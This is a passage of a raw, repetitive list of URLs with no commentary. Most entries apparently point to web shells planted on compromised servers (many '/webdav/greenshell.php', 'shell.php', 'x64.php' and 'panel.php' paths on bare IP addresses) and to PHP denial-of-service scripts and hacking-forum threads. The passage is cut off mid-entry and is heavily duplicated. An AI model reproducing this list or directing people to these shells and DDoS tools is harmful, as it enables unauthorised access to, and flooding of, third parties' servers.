Read&t=9acba20c952241e625770c058c7470f4dde2990c\r\nhttp://odrp.eu.nu/\r\nhttp://00000.000a.de/PHP/\r\nhttp://eq22.weebly.com/\r\nhttp://odrp.eu.nu/index.php?page=ThreadsFeed&format=atom\r\nhttp://firman-mannte.blogspot.com/2011_04_01_archive.html\r\nhttp://www.fahriozturk.tr.gg/111.htm?PHP...b1fb9bcef/\r\nhttp://www.rocksecuritycams.741.com/ddos.html\r\nhttp://www.insert-forum.hostujem.sk/\r\nhttp://www.hesoyam.website.org/\r\nhttp://toutsourtous.anatoile.com/html.php?id_menu=3206841\r\nhttp://www.jinggai315.com/lys/\r\nhttp://www.fahriozturk.tr.gg/111.htm?PHP...7b1fb9b.../\r\nhttp://www.anarchistcookbook.com/showthread.php/33795-PHP\r\nhttp://www.1100f.com/member\r\nhttp://www.fahriozturk.tr.gg/111.htm?PHPSESSID=8e7.../\r\nhttp://zhan.liechesk.cn/hechihuagong.com.cn-domain\r\nhttp://www.fahriozturk.tr.gg/111.htm?PHPSESSID=8e7467e5523dbf043564467b1fb9bcef/\r\nhttp://www.fahriozturk.tr.gg/111.htm?PHP...b1fb9bcef\r\nhttp://d-dos.50webs.com/ddos.php\r\nhttp://www.team-crowplay.de/function.php\r\nhttp://www.fahriozturk.tr.gg/111.htm\r\nhttp://d-dos.50webs.com/ddos.php\r\nhttp://feeds2.feedburner.com/alivingtruth/DRwH/\r\nhttp://belakshell.50webs.com/index.php\r\nhttp://yogeshmehra1987.110mb.com/index.php\r\nhttp://pastie.org/pastes/1044528/download/\r\nhttp://urmybest.110mb.com/phpdos.php\r\nhttp://www.team-crowplay.de/\r\nhttp://feeds2.feedburner.com/alivingtruth/DRwH\r\nhttp://www.1100f.com/member/\r\nhttp://www.fahriozturk.tr.gg/111.htm\r\nhttp://www.fahriozturk.tr.gg/111.htm?PHP...b1fb9bcef/\r\nhttp://www.tux-planet.fr/public/hack/ddos/php-dos.phps\r\nhttp://www.dinamo.com.nu/php/\r\nhttp://www.fahriozturk.tr.gg/111.htm?PHP.../index.php\r\nhttp://www.fahriozturk.tr.gg/111.htm?PHPSESSID=8e7...\r\nhttp://pastie.org/pastes/1044528/download\r\nhttp://www.fahriozturk.tr.gg/111.htm?PHP...7b1fb9b.../\r\nhttp://eq22.weebly.com/\r\nhttp://www.team-crowplay.de/index.php\r\nhttp://www.fahriozturk.tr.gg/111.htm?PHP...7b1fb9b...\r\nhttp://www.team-crowplay.de/function.php\r\nhttp://www.fahriozturk.tr.gg/111.htm?PHP...7b1fb9bcef/\r\nhttp://firman-mannte.blogspot.com/\r\nhttp://www.fahriozturk.tr.gg/111.htm?PHP...7b1fb9bcef\r\nhttp://firman-mannte.blogspot.com/2011_04_01_archive.html\r\nhttp://toutsourtous.anatoile.com/html.php?id_menu=3206841\r\nhttp://eq22.weebly.com\r\nhttp://www.team-crowplay.de\r\nhttp://www.fahriozturk.tr.gg/111.htm?PHPSESSID=8e7467e5523dbf043564467b1fb9bcef/\r\nhttp://firman-mannte.blogspot.com\r\nhttp://virusgamingz.roxorgamers.com\r\nhttp://mehdi4604.persiangig.com/vbulltien/ddos.php\r\nhttp://aldy.byethost2.com\r\nhttp://surrealesport.su.funpic.de/index.php?forum-privmsg-new=0&empfid=1\r\nhttp://avatarmovieonline.110mb.com\r\nhttp://firman-mannte.blogspot.com/2011/04/packets-0-ip-post-rand-post.html\r\nhttp://link270.000space.com\r\nhttp://www.anarchistcookbook.com/showthread.php/33795-PHP-DoS-Script\r\nhttp://www.insert-forum.hostujem.sk\r\nhttp://pastebin.com/7qx7kust\r\nhttp://www.rocksecuritycams.741.com/ddos.html\r\nhttp://niyuavalon.webege.com/phpddos/control\r\nhttp://surrealesport.su.funpic.de\r\nhttp://ngoisaoblog.vn/DDOS.php\r\nhttp://www.hesoyam.website.org\r\nhttp://belsec.skynetblogs.be/archive/2010/05/19/next-getting-hacked-to-ddos-another-site-to-death-and-get-su.html\r\nhttp://tinypaste.com/e38333\r\nhttp://www.anarchistcookbook.com/archive/index.php/t-33795.html?\r\nhttp://surrealesport.su.funpic.de/index.php?user-details-1\r\nhttp://dinamo.com.nu/php\r\nhttp://dos123.uw.hu/index.php\r\nhttp://ngl-1.com/\r\nhttp://lanzador.tupoeta.com/dos\r\nhttp://zoobooter.webs.com\r\nhttp://www.jinggai315.com/lys\r\nhttp://surrealesport.su.funpic.de/index.php?user-mail-1\r\nhttp://surrealesport.su.funpic.de/index.php\r\nhttp://pastie.org/pastes/470709/reply\r\nhttp://fahriozturk.tr.gg/111.htm\r\nhttp://www.dinamo.com.nu/php\r\nhttp://blog-indonesia.com/blog-archive-5103-211.html\r\nhttp://www.fahriozturk.tr.gg/111.htm?PHP...b1fb9bcef\r\nhttp://ashiyane.org/forums/showthread.php?p=154364\r\nhttp://arhack.net/vb/showthread.php?p=446937\r\nhttp://46.166.148.63/shell.php\r\nhttp://www.fahriozturk.tr.gg/111.htm?PHP...b1fb9bcef/\r\nhttp://62.82.102.40/webdav/sprint.php\r\nhttp://www.mylilygirl.com/photos/tpl_c/x.php\r\nhttp://taslargrup.com/templates/beez/server.php\r\nhttp://belakshell.50webs.com/index.php\r\nhttp://joomlaedge.com/upload/0x.php\r\nhttp://88.198.132.250/webdav/Emb.php\r\nhttp://114.112.49.8/webdav/Emb.php\r\nhttp://www.gfdgdfgfdgfd.co.cc/shell.php\r\nhttp://217.128.142.249/webdav/greenshell.php\r\nhttp://204.191.9.89/webdav/shell16182.php\r\nhttp://www.theresahackforthat.webs.com/shell.php\r\nhttp://www.ecofilms.gr/search_gr.asp?act=phptools&...\r\nhttp://theresahackforthat.webs.com/shell.php\r\nhttp://www.ecofilms.gr/search_gr.asp\r\nhttp://www.ecofilms.gr/search_gr.asp?act=phptools&.../\r\nhttp://www.ecofilms.gr/search_gr.asp?act=phptools\r\nhttp://shells.red-pill.eu\r\nhttp://mapi.co.kr/zb41pl7/bbs/data/mapi_bbs/settings.php\r\nhttp://shells.red-pill.eu/\r\nhttp://163.178.170.74/webdav/greenshell.php\r\nhttp://gfdgdfgfdgfd.co.cc/shell.php\r\nhttp://www.ecofilms.gr/search_gr.asp?act...ols&hos...\r\nhttp://tools.rosinstrument.com/proxy/?rule1\r\nhttp://www.ecofilms.gr/search_gr.asp?act...ols\r\nhttp://67.174.216.22/webdav/sprint.php\r\nhttp://feeds2.feedburner.com/alivingtruth/DRwH/\r\nhttp://66.240.176.132/webdav/sprint.php\r\nhttp://www.ecofilms.gr/search_gr.asp?act=phptools/\r\nhttp://www.ecofilms.gr/search_gr.asp?act...ols&host=/\r\nhttp://82.114.168.38/webdav/greenshell.php\r\nhttp://www.windowsecurity.com/faqs/Trojans/\r\nhttp://www.offensive-security.com/metasploit-unleashed/Antivirus_Bypass\r\nhttp://82.114.168.38/webdav/greenshell.php?act=php...\r\nhttp://72.55.60.50/webdav/sprint.php\r\nhttp://00000.000a.de/PHP/\r\nhttp://www.ecofilms.gr/search_gr.asp?&.../\r\nhttp://www.indianethicalhacker.blackapplehost.com/xoep.php?act=phptools&host=/\r\nhttp://69.162.116.106/webdav/sprint.php\r\nhttp://82.114.168.38/webdav/greenshell.php?act=phptools&host=/\r\nhttp://www.sidarglobal.com/help.php\r\nhttp://indianethicalhacker.blackapplehost.com/xoep.php?act=phptools&host=/\r\nhttp://203.153.230.78/webdav/config.php\r\nhttp://www.fahriozturk.tr.gg/111.htm\r\nhttp://www.team-crowplay.de/function.php\r\nhttp://www.fahriozturk.tr.gg/111.htm?PHP...b1fb9bcef\r\nhttp://d-dos.50webs.com/ddos.php\r\nhttp://zhan.liechesk.cn/hechihuagong.com.cn-domain\r\nhttp://www.fahriozturk.tr.gg/111.htm?PHPSESSID=8e7.../\r\nhttp://www.1100f.com/member\r\nhttp://www.fahriozturk.tr.gg/111.htm?PHP...7b1fb9b.../\r\nhttp://toutsourtous.anatoile.com/html.php?id_menu=3206841\r\nhttp://www.jinggai315.com/lys/\r\nhttp://d-dos.50webs.com/ddos.php\r\nhttp://toutsourtous.anatoile.com/html.php?id_menu=3206841\r\nhttp://www.hesoyam.website.org/\r\nhttp://feeds2.feedburner.com/alivingtruth/DRwH\r\nhttp://belakshell.50webs.com/index.php\r\nhttp://beacheater.blogspot.com/2011/01/php-dos.html\r\nhttp://feeds2.feedburner.com/alivingtruth/DRwH/\r\nhttp://www.insert-forum.hostujem.sk/\r\nhttp://www.dinamo.com.nu/php/\r\nhttp://firman-mannte.blogspot.com/\r\nhttp://www.1100f.com/member/\r\nhttp://www.tux-planet.fr/public/hack/ddos/php-dos.phps\r\nhttp://niyuavalon.webege.com/phpddos/control/\r\nhttp://tinypaste.com/e38333\r\nhttp://dinamo.com.nu/php/\r\nhttp://avatarmovieonline.110mb.com/\r\nhttp://pulsar-tec.com/\r\nhttp://toutsourtous.webobo.biz/html.php?id_menu=3336677\r\nhttp://virusgamingz.roxorgamers.com/\r\nhttp://www.fahriozturk.tr.gg/111.htm/\r\nhttp://firman-mannte.blogspot.com/2011_04_01_archive.html\r\nhttp://www.fahriozturk.tr.gg/111.htm?PHP...b1fb9bcef/\r\nhttp://pastie.org/pastes/1044528/download\r\nhttp://www.fahriozturk.tr.gg/111.htm?PHP...7b1fb9bcef/\r\nhttp://www.fahriozturk.tr.gg/111.htm\r\nhttp://firman-mannte.blogspot.com/2011_04_01_archive.html\r\nhttp://odrp.eu.nu/index.php?page=ThreadsFeed&format=atom\r\nhttp://toutsourtous.anatoile.com/html.php?id_menu=3206841\r\nhttp://00000.000a.de/PHP/\r\nhttp://eq22.weebly.com/\r\nhttp://www.fahriozturk.tr.gg/111.htm?PHPSESSID=8e7467e5523dbf043564467b1fb9bcef/\r\nhttp://odrp.eu.nu/\r\nhttp://zhan.liechesk.cn/hechihuagong.com.cn-domain\r\nhttp://www.fahriozturk.tr.gg/111.htm?PHP...7b1fb9b...\r\nhttp://pastie.org/pastes/1044528/download/\r\nhttp://feeds2.feedburner.com/alivingtruth/DRwH/\r\nhttp://odrp.eu.nu/index.php?action=BoardMarkAllAsRead&t=9acba20c952241e625770c058c7470f4dde2990c\r\nhttp://www.fahriozturk.tr.gg/111.htm\r\nhttp://www.fahriozturk.tr.gg/111.htm/\r\nhttp://belakshell.50webs.com/index.php\r\nhttp://d-dos.50webs.com/ddos.php\r\nhttp://pastie.org/pastes/1044528/download/\r\nhttp://www.fahriozturk.tr.gg/111.htm?PHP...7b1fb9bcef/\r\nhttp://dos123.uw.hu/index.php\r\nhttp://zhan.liechesk.cn/hechihuagong.com.cn-domain\r\nhttp://toutsourtous.webobo.biz/html.php?id_menu=3336677\r\nhttp://toutsourtous.webobo.com/html.php?id_menu=3336677\r\nhttp://belsec.skynetblogs.be/post/7896874/next--getting-hacked-to-ddos-another-site-to-\r\nhttp://www.fahriozturk.tr.gg/111.htm?PHP...7b1fb9bcef\r\nhttp://fahriozturk.tr.gg/111.htm?PHP...7b1fb9bcef\r\nhttp://www.fahriozturk.tr.gg/111.htm?PHP.../index.php\r\nhttp://www.fahriozturk.tr.gg/111.htm?PHP...7b1fb9bcef/index.php\r\nhttp://feeds2.feedburner.com/alivingtruth/DRwH/\r\nhttp://www.fahriozturk.tr.gg/111.htm\r\nhttp://www.dinamo.com.nu/php/\r\nhttp://www.1100f.com/member/\r\nhttp://belakshell.50webs.com/index.php\r\nhttp://pastie.org/pastes/1044528/download/\r\nhttp://www.1100f.com/member/\r\nhttp://www.dinamo.com.nu/php/\r\nhttp://202.190.74.200/webdav/x32.php\r\nhttp://www.ecofilms.gr/search_gr.asp\r\nhttp://82.114.168.38/webdav/greenshell.php\r\nhttp://www.fahriozturk.tr.gg/111.htm/\r\nhttp://feeds2.feedburner.com/alivingtruth/DRwH\r\nhttp://www.ecofilms.gr/search_gr.asp\r\nhttp://www.dinamo.com.nu/php/\r\nhttp://feeds2.feedburner.com/alivingtruth/DRwH/\r\nhttp://pastie.org/pastes/1044528/download/\r\nhttp://www.1100f.com/member/\r\nhttp://www.tux-planet.fr/public/hack/ddos/php-dos.phps\r\nhttp://belakshell.50webs.com/index.php\r\nhttp://www.fahriozturk.tr.gg/111.htm/\r\nhttp://www.fahriozturk.tr.gg/111.htm?PHP...7b1fb9bcef/\r\nhttp://toutsourtous.webobo.biz/html.php?id_menu=3336677\r\nhttp://belakshell.50webs.com/index.php\r\nhttp://feeds2.feedburner.com/alivingtruth/DRwH\r\nhttp://www.ecofilms.gr/search_gr.asp\r\nhttp://www.ecofilms.gr/search_gr.asp\r\nhttp://www.theresahackforthat.webs.com/shell.php\r\nhttp://shells.red-pill.eu/\r\nhttp://82.114.168.38/webdav/greenshell.php\r\nhttp://surrealesport.su.funpic.de/index.php?forum-privmsg-new=0&empfid=1\r\nhttp://www.fahriozturk.tr.gg/111.htm\r\nhttp://www.team-crowplay.de/index.php\r\nhttp://feeds2.feedburner.com/alivingtruth/DRwH\r\nhttp://virusgamingz.roxorgamers.com/\r\nhttp://www.ecofilms.gr/search_gr.asp\r\nhttp://shells.red-pill.eu/\r\nhttp://feeds2.feedburner.com/alivingtruth/DRwH\r\nhttp://d-dos.50webs.com/ddos.php\r\nhttp://tinypaste.com/e38333\r\nhttp://www.1100f.com/member/\r\nhttp://www.ecofilms.gr/search_gr.asp\r\nhttp://shells.red-pill.eu/\r\nhttp://d-dos.50webs.com/ddos.php\r\nhttp://d-dos.50webs.com/ddos.php\r\nhttp://www.fahriozturk.tr.gg/111.htm\r\nhttp://www.fahriozturk.tr.gg/111.htm?PHP...7b1fb9b...\r\nhttp://www.anarchistcookbook.com/showthread.php/33795-PHP-DoS-Script\r\nhttp://www.fahriozturk.tr.gg/111.htm?PHPSESSID=8e7...\r\nhttp://pastie.org/pastes/1044528/download/\r\nhttp://toutsourtous.webobo.biz/html.php?id_menu=3336677\r\nhttp://www.fahriozturk.tr.gg/111.htm/\r\nhttp://www.fahriozturk.tr.gg/111.htm?PHP...7b1fb9bcef/\r\nhttp://82.114.168.38/webdav/Pk.php\r\nhttp://feeds2.feedburner.com/alivingtruth/DRwH\r\nhttp://163.178.170.74/webdav/greenshell.php\r\nhttp://www.ecofilms.gr/search_gr.asp?act=phptools&...\r\nhttp://www.ecofilms.gr/search_gr.asp?act...ols&host=/\r\nhttp://gfdgdfgfdgfd.co.cc/shell.php\r\nhttp://theresahackforthat.webs.com/shell.php\r\nhttp://shells.red-pill.eu\r\nhttp://204.191.9.89/webdav/shell16182.php\r\nhttp://www.indianethicalhacker.blackapplehost.com/xoep.php?act=phptools&host=/\r\nhttp://www.indianethicalhacker.blackapplehost.com/xoep.php\r\nhttp://www.gfdgdfgfdgfd.co.cc/shell.php\r\nhttp://mapi.co.kr/zb41pl7/bbs/data/mapi_bbs/settings.php\r\nhttp://82.114.168.38/webdav/greenshell.php\r\nhttp://www.ecofilms.gr/search_gr.asp?act=phptools/\r\nhttp://www.ecofilms.gr/search_gr.asp?act=phptools&.../\r\nhttp://www.theresahackforthat.webs.com/shell.php\r\nhttp://shells.red-pill.eu/\r\nhttp://www.fahriozturk.tr.gg/111.htm?PHP...7b1fb9bcef/\r\nhttp://ngoisaoblog.vn/DDOS.php\r\nhttp://dinamo.com.nu/php/\r\nhttp://www.fahriozturk.tr.gg/111.htm\r\nhttp://firman-mannte.blogspot.com/\r\nhttp://firman-mannte.blogspot.com/2011_04_01_archive.html\r\nhttp://eq22.weebly.com/\r\nhttp://niyuavalon.webege.com/phpddos/control/\r\nhttp://aldy.byethost2.com/\r\nhttp://www.fahriozturk.tr.gg/111.htm\r\nhttp://avatarmovieonline.110mb.com/\r\nhttp://zhan.liechesk.cn/hechihuagong.com.cn-domain\r\nhttp://www.team-crowplay.de/function.php\r\nhttp://www.anarchistcookbook.com/showthread.php/33795-PHP\r\nhttp://fahriozturk.tr.gg/111.htm?PHP...7b1fb9bcef\r\nhttp://toutsourtous.anatoile.com/html.php?id_menu=3206841\r\nhttp://d-dos.50webs.com/ddos.php\r\nhttp://beacheater.blogspot.com/2011/01/php-dos.html\r\nhttp://toutsourtous.webobo.biz/html.php?id_menu=3336677\r\nhttp://feeds2.feedburner.com/alivingtruth/DRwH/\r\nhttp://www.rocksecuritycams.741.com/ddos.html\r\nhttp://eq22.weebly.com/\r\nhttp://www.1100f.com/member/\r\nhttp://firman-mannte.blogspot.com/\r\nhttp://www.anarchistcookbook.com/showthread.php/33795-PHP\r\nhttp://www.1100f.com/member/\r\nhttp://d-dos.50webs.com/ddos.php\r\nhttp://toutsourtous.webobo.biz/html.php?id_menu=3336677\r\nhttp://pastie.org/pastes/1044528/download/\r\nhttp://www.fahriozturk.tr.gg/111.htm?PHP...7b1fb9bcef/\r\nhttp://firman-mannte.blogspot.com/\r\nhttp://www.anarchistcookbook.com/showthread.php/33795-PHP-DoS-Script\r\nhttp://pastie.org/pastes/1044528/download\r\nhttp://www.fahriozturk.tr.gg/111.htm/\r\nhttp://firman-mannte.blogspot.com/2011_04_01_archive.html\r\nhttp://beacheater.blogspot.com/2011/01/php-dos.html\r\nhttp://www.tux-planet.fr/public/hack/ddos/php-dos.phps\r\nhttp://pastie.org/pastes/1044528/download\r\nhttp://beacheater.blogspot.com/2011/01/php-dos.html\r\nhttp://firman-mannte.blogspot.com/\r\nhttp://pastie.org/pastes/1044528/download/\r\nhttp://dinamo.com.nu/php/\r\nhttp://www.ecofilms.gr/search_gr.asp\r\nhttp://www.tux-planet.fr/public/hack/ddos/php-dos.phps\r\nhttp://www.indianethicalhacker.blackapplehost.com/xoep.php\r\nhttp://82.114.168.38/webdav/greenshell.php?act=phptools&host=/\r\nhttp://www.indianethicalhacker.blackapplehost.com/xoep.php?act=phptools&host=/\r\nhttp://shells.red-pill.eu/\r\nhttp://www.jinggai315.com/lys/\r\nhttp://www.dinamo.com.nu/php/\r\nhttp://www.corrado-club.ca/images/yummy.php\r\nhttp://www.selahservice.com/images/yummy.php\r\nhttp://belakshell.50webs.com/index.php\r\nhttp://www.insert-forum.hostujem.sk/\r\nhttp://www.dinamo.com.nu/php/\r\nhttp://beacheater.blogspot.com/2011/01/php-dos.html\r\nhttp://urmybest.110mb.com/phpdos.php\r\nhttp://virusgamingz.roxorgamers.com/\r\nhttp://surrealesport.su.funpic.de/index.php?forum-privmsg-new=0&empfid=1\r\nhttp://d-dos.50webs.com/ddos.php\r\nhttp://belakshell.50webs.com/index.php\r\nhttp://d-dos.50webs.com/ddos.php\r\nhttp://www.circlesofpeace.us/news/images/yummy.php\r\nhttp://feeds2.feedburner.com/alivingtruth/DRwH\r\nhttp://www.anarchistcookbook.com/showthread.php/33795-PHP-DoS-Script\r\nhttp://dos123.uw.hu/index.php\r\nhttp://odrp.eu.nu/index.php?page=ThreadsFeed&format=atom\r\nhttp://pastie.org/pastes/1044528/download\r\nhttp://yogeshmehra1987.110mb.com/index.php\r\nhttp://200.140.145.29/webdav/get.php\r\nhttp://belakshell.50webs.com/index.php\r\nhttp://202.190.74.200/webdav/x32.php\r\nhttp://yogeshmehra1987.110mb.com/index.php\r\nhttp://pastie.org/pastes/1044528/download/\r\nhttp://204.191.9.89/webdav/shell16182.php\r\nhttp://ngoisaoblog.vn/DDOS.php\r\nhttp://odrp.eu.nu/index.php?action=BoardMarkAllAsRead&t=9acba20c952241e625770c058c7470f4dde2990c\r\nhttp://hesoyam.website.org/\r\nhttp://217.6.136.144/webdav/greenshell.php\r\nhttp://217.6.136.144/webdav/greenshell.php\r\nhttp://odrp.eu.nu/\r\nhttp://colla.cr4ck.ru/s/\r\nhttp://feeds2.feedburner.com/alivingtruth/DRwH/\r\nhttp://beacheater.blogspot.com/2011/01/php-dos.html\r\nhttp://belakshell.50webs.com/index.php\r\nhttp://www.braille-house.com/components/out/\r\nhttp://mehdi4604.persiangig.com/vbulltien/ddos.php\r\nhttp://d-dos.50webs.com/ddos.php\r\nhttp://niyuavalon.webege.com/phpddos/control/\r\nhttp://eq22.weebly.com/\r\nhttp://fahriozturk.tr.gg/111.htm?PHP...7b1fb9bcef\r\nhttp://feeds2.feedburner.com/alivingtruth/DRwH\r\nhttp://firman-mannte.blogspot.com/\r\nhttp://gfdgdfgfdgfd.co.cc/shell.php\r\nhttp://indianethicalhacker.blackapplehost.com/xoep.php\r\nhttp://feeds2.feedburner.com/alivingtruth/DRwH/\r\nhttp://mapi.co.kr/zb41pl7/bbs/data/mapi_bbs/settings.php\r\nhttp://mmx1.webs.com/shell.php\r\nhttp://d-dos.50webs.com/ddos.php\r\nhttp://pastie.org/pastes/1044528/download\r\nhttp://pickme.3x.ro/uploads/cyber.php\r\nhttp://mehdi4604.persiangig.com/vbulltien/ddos.php\r\nhttp://www.team-crowplay.de/\r\nhttp://rahmat.tv/mount/php-dos-coded-by-exe.htm\r\nhttp://shells.red-pill.eu\r\nhttp://sockslist.net/proxy/server-socks-hide-ip-address/2#proxylist\r\nhttp://team-crowplay.de/\r\nhttp://theresahackforthat.webs.com/shell.php\r\nhttp://tools.rosinstrument.com/proxy/?rule1\r\nhttp://toutsourtous.anatoile.com/html.php?id_menu=3206841\r\nhttp://eq22.weebly.com/\r\nhttp://urmybest.110mb.com/phpdos.php\r\nhttp://www.anarchistcookbook.com/showthread.php/33795-PHP\r\nhttp://www.rocksecuritycams.741.com/ddos.html\r\nhttp://www.fahriozturk.tr.gg/111.htm?PHPSESSID=8e7467e5523dbf043564467b1fb9bcef/\r\nhttp://www.anarchistcookbook.com/showthread.php/33795-PHP\r\nhttp://www.dinamo.com.nu/php/\r\nhttp://www.ecofilms.gr/search_gr.asp\r\nhttp://www.fahriozturk.tr.gg/111.htm\r\nhttp://www.gfdgdfgfdgfd.co.cc/shell.php\r\nhttp://www.indianethicalhacker.blackapplehost.com/xoep.php\r\nhttp://www.sidarglobal.com/help.php\r\nhttp://www.sidarglobal.com/help.php\r\nhttp://www.team-crowplay.de/\r\nhttp://www.theresahackforthat.webs.com/shell.php\r\nhttp://www.tux-planet.fr/public/hack/ddos/php-dos.phps\r\nhttp://200.69.105.206/webdav/sprint.php\r\nhttp://feeds2.feedburner.com/alivingtruth/DRwH\r\nhttp://yogeshmehra1987.110mb.com/index.php\r\nhttp://zhan.liechesk.cn/hechihuagong.com.cn-domain\r\nhttp://190.144.174.250/webdav/greenshell.php\r\nhttp://194.110.192.121/xmlrpc/includes/shell.php\r\nhttp://195.15.2.83/webdav/panel.php\r\nhttp://198.104.131.210/webdav/panel.php\r\nhttp://24.155.184.77/webdav/panel.php\r\nhttp://212.182.69.18/webdav/panel.php\r\nhttp://190.96.251.200/webdav/x64.php\r\nhttp://201.131.19.132/webdav/greenshell.php\r\nhttp://189.254.218.34/webdav/greenshell.php\r\nhttp://190.145.105.118/webdav/toxic2.php\r\nhttp://190.145.105.118/webdav/toxic3.php\r\nhttp://190.145.105.118/webdav/toxic5.php\r\nhttp://81.223.64.3/webdav/greenshell.php\r\nhttp://190.145.105.118/webdav/toxic.php\r\nhttp://217.6.136.144/webdav/greenshell.php\r\nhttp://190.145.105.118/webdav/toxic4.php\r\nhttp://190.145.105.118/webdav/toxic9.php\r\nhttp://140.127.52.24/webdav/greenshell.php\r\nhttp://190.145.105.118/webdav/toxic7.php\r\nhttp://190.145.105.118/webdav/toxic6.php\r\nhttp://89.104.195.200/webdav/x32.php\r\nhttp://190.145.105.118/webdav/toxic10.php\r\nhttp://87.103.134.31/webdav/x32.php\r\nhttp://112.201.103.203/webdav/panel.php\r\nhttp://114.142.147.125/webdav/shell.php\r\nhttp://203.197.246.13/webdav/panel.php\r\nhttp://200.80.8.198/webdav/mouss.php\r\nhttp://200.80.8.198/webdav/greenshell.php\r\nhttp://187.45.112.32/webdav/x64.php\r\nhttp://125.21.85.66/webdav/greenshell.php\r\nhttp://reckon.megabyet.net/index.php\r\nhttp://b00tles.megabyet.net/index.php\r\nhttp://reckon.megabyet.net/\r\nhttp://urmybest.110mb.com/phpdos.php\r\nhttp://belakshell.50webs.com/index.php\r\nhttp://111.67.195.8/webdav/panel.php\r\nhttp://161.58.93.18/webdav/panel.php\r\nhttp://190.103.101.170/webdav/x64.php\r\nhttp://beans.tv/ulogs.php\r\nhttp://nksoft.de/ulogs.php\r\nhttp://mirllc.com/ulogs.php\r\nhttp://69.13.40.82/webdav/x32.php\r\nhttp://ma77o.info/shell/77shell/shell.php\r\nhttp://190.145.105.118/webdav/toxic1.php\r\nhttp://190.145.105.118/webdav/toxic8.php\r\nhttp://134.68.158.28/webdav/shell.php\r\nhttp://58.26.6.92/webdav/form.php\r\nhttp://www.inchoates.com/smf/index.php\r\nhttp://shells.red-pill.eu/\r\nhttp://d-dos.50webs.com/ddos.php\r\nhttp://yogeshmehra1987.110mb.com/index.php\r\nhttp://www.hexagonholdings.com/Portals/0/11.php\r\nhttp://armavir-shop.ru/inde.php\r\nhttp://www.fahriozturk.tr.gg/111.htm\r\nhttp://www.1100f.com/member/index.php\r\nhttp://sxleton.awardspace.us/index.php\r\nhttp://93.17.7.149/webdav/shell.php\r\nhttp://61.129.51.224/webdav/panel.php\r\nhttp://178.77.68.206/webdav/x32.php\r\nhttp://212.85.40.233/webdav/x64.php\r\nhttp://187.46.80.196/webdav/x64.php\r\nhttp://187.52.105.162/webdav/x64.php\r\nhttp://212.85.40.233/webdav/x32.php\r\nhttp://46.2.46.140/webdav/x64.php\r\nhttp://190.92.6.237/webdav/x64.php\r\nhttp://190.101.102.71/webdav/x64.php\r\nhttp://190.103.235.12/webdav/x64.php\r\nhttp://178.77.68.206/webdav/x64.php\r\nhttp://187.59.52.138/webdav/x64.php\r\nhttp://201.51.246.185/webdav/x64.php\r\nhttp://201.86.171.71/webdav/x64.php\r\nhttp://95.82.248.96/webdav/_x64.php\r\nhttp://187.54.177.172/webdav/x64.php\r\nhttp://201.77.115.131/webdav/x64.php\r\nhttp://190.94.112.32/webdav/x64.php\r\nhttp://202.196.33.153/webdav/greenshell.php\r\nhttp://46.0.85.27/webdav/x64.php\r\nhttp://190.95.231.66/webdav/x64.php\r\nhttp://190.101.125.117/webdav/x64.php\r\nhttp://95.9.105.33/webdav/ulogs.php\r\nhttp://85.183.88.7/webdav/greenshell.php\r\nhttp://65.89.135.254/webdav/panel.php\r\nhttp://147.96.144.90/webdav/greenshell.php\r\nhttp://190.244.29.113/webdav/panel.php\r\nhttp://124.155.211.235/webdav/x32.php\r\nhttp://190.24.133.205/webdav/form.php\r\nhttp://221.116.9.29/webdav/panel.php\r\nhttp://122.183.217.136/webdav/greenshell.php\r\nhttp://72.0.34.195/webdav/greenshell.php\r\nhttp://97.104.27.168/webdav/ulogs.php\r\nhttp://76.160.223.161/webdav/greenshell.php\r\nhttp://207.191.208.144/webdav/greenshell.php\r\nhttp://60.240.232.232/webdav/shell.php\r\nhttp://91.113.215.58/webdav/shell.php\r\nhttp://91.114.11.122/webdav/shell.php\r\nhttp://81.255.199.42/webdav/mouss.php\r\nhttp://66.255.37.124/webdav/shell.php\r\nhttp://220.245.100.87/webdav/shell.php\r\nhttp://203.10.47.149/webdav/mouss.php\r\nhttp://213.33.48.202/webdav/shell.php\r\nhttp://85.25.16.170/webdav/x32.php\r\nhttp://91.121.166.14/webdav/x32.php\r\nhttp://91.121.100.84/webdav/x32.php\r\nhttp://65.52.34.176/webdav/form.php\r\nhttp://190.216.51.80/webdav/form.php\r\nhttp://93.108.190.239/webdav/form.php\r\nhttp://203.97.107.214/webdav/x32.php\r\nhttp://132.248.52.174/webdav/panel.php\r\nhttp://82.112.32.42/webdav/x32.php\r\nhttp://140.133.6.59/webdav/form.php\r\nhttp://219.75.241.125/webdav/form.php\r\nhttp://148.160.170.108/webdav/panel.php\r\nhttp://189.205.253.104/webdav/panel.php\r\nhttp://178.124.148.32/webdav/panel.php\r\nhttp://120.105.97.7/webdav/panel.php\r\nhttp://112.207.146.238/webdav/panel.php\r\nhttp://110.138.183.143/webdav/panel.php\r\nhttp://190.66.25.27/webdav/panel.php\r\nhttp://200.140.145.29/webdav/panel.php\r\nhttp://201.228.144.124/webdav/panel.php\r\nhttp://122.165.52.189/webdav/panel.php\r\nhttp://140.115.80.111/webdav/panel.php\r\nhttp://202.129.207.194/webdav/panel.php\r\nhttp://69.143.28.40/webdav/panel.php\r\nhttp://82.212.128.142/webdav/panel.php\r\nhttp://140.127.32.86/webdav/panel.php\r\nhttp://71.184.200.8/webdav/panel.php\r\nhttp://130.179.30.237/webdav/panel.php\r\nhttp://88.26.206.142/webdav/panel.php\r\nhttp://150.146.34.11/webdav/panel.php\r\nhttp://194.141.64.138/webdav/panel.php\r\nhttp://122.49.77.59/webdav/panel.php\r\nhttp://120.127.14.41/webdav/greenshell.php\r\nhttp://66.71.191.93/webdav/panel.php\r\nhttp://217.41.23.194/webdav/panel.php\r\nhttp://58.214.243.158/webdav/toxic2.php\r\nhttp://174.127.45.194/webdav/panel.php\r\nhttp://93.17.7.149/webdav/greenshell.php\r\nhttp://150.254.77.190/webdav/greenshell.php\r\nhttp://140.126.130.205/webdav/panel.php\r\nhttp://93.17.7.151/webdav/shell.php\r\nhttp://93.17.7.150/webdav/greenshell.php\r\nhttp://93.17.7.148/webdav/greenshell.php\r\nhttp://monederocfe.com/webdav/x32.php\r\nhttp://82.127.64.56/webdav/shell.php\r\nhttp://82.127.64.56/webdav/greenshell.php\r\nhttp://24.155.184.77/webdav/panel.php\r\nhttp://b00tles.megabyet.net/index.php\r\nhttp://reckon.megabyet.net/index.php\r\nhttp://190.144.174.250/webdav/greenshell.php\r\nhttp://reckon.megabyet.net/\r\nhttp://194.110.192.121/xmlrpc/includes/shell.php\r\nhttp://201.131.19.132/webdav/greenshell.php\r\nhttp://212.182.69.18/webdav/panel.php\r\nhttp://134.68.158.28/webdav/shell.php\r\nhttp://190.96.251.200/webdav/x64.php\r\nhttp://89.104.195.200/webd